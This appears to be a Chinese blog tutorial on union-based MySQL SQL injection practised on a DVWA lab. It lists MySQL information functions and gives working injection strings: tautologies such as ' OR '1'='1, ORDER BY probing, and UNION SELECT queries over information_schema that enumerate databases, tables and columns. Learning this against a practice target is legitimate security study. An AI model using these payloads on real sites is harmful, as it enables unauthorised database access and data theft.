mysql一般注入(select)

常用的MYSQL查询函数

version() #MySQL版本

user() #数据库用户名

database() #数据库名

@@datadir #数据库路径

@@version_compile_os #操作系统版本

current_user() #当前用户

session_user()

load_file() #返回文件的内容

搭建DVWA靶机 

 
注入参数:id=1

判断

' OR '1'='1&Submit=Submit
' OR '1'='1--+&Submit=Submit
' OR '1'='1--;&Submit=Submit
or 1=1--+
'or 1=1--+
"or 1=1--+
)or 1=1--+
')or 1=1--+
") or 1=1--+
"))or 1=1--+
--+ 可以用#替换,url 提交过程中 Url 编码后的#为%23

提交' OR '1'='1&Submit=Submit 的时候条件恒真将查询当前表中所有行

1.png

2.png

order by

'order by 33--+&Submit=Submit 

http://dvwa.com/vulnerabilities/sqli/?id=2'order by 33--+&Submit=Submit 

查询

这里使用 借助information_schema库进行枚举 MYSQL5.0以前的版本没有这个东西

--枚举数据库

'and 1=2 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata--+&Submit=Submit

ku.png

--枚举表  (数据库名不用字符串就用16进制的编码)

' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x6169726531-+&Submit=Submit'
' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='aire1'--+&Submit=Submit

b.png

--枚举字段 (数据库和表名不用字符串就用16进制的编码)

' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='aire1' and table_name='com_user'--+&Submit=Submit

9.png

--枚举值

有了数据库 表 字段 查询值就相对简单了

本博客所有文章如无特别注明均为原创。作者:odaycaogen复制或转载请以超链接形式注明转自 123``blog
原文地址《mysql一般注入(select)

郑重声明:本文只做技术交流学习使用,请尊重当地法规法律,勿对企业或个人网站及app进行破坏。如产生连带法律责任 123``blog 作者本人概不负责。

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)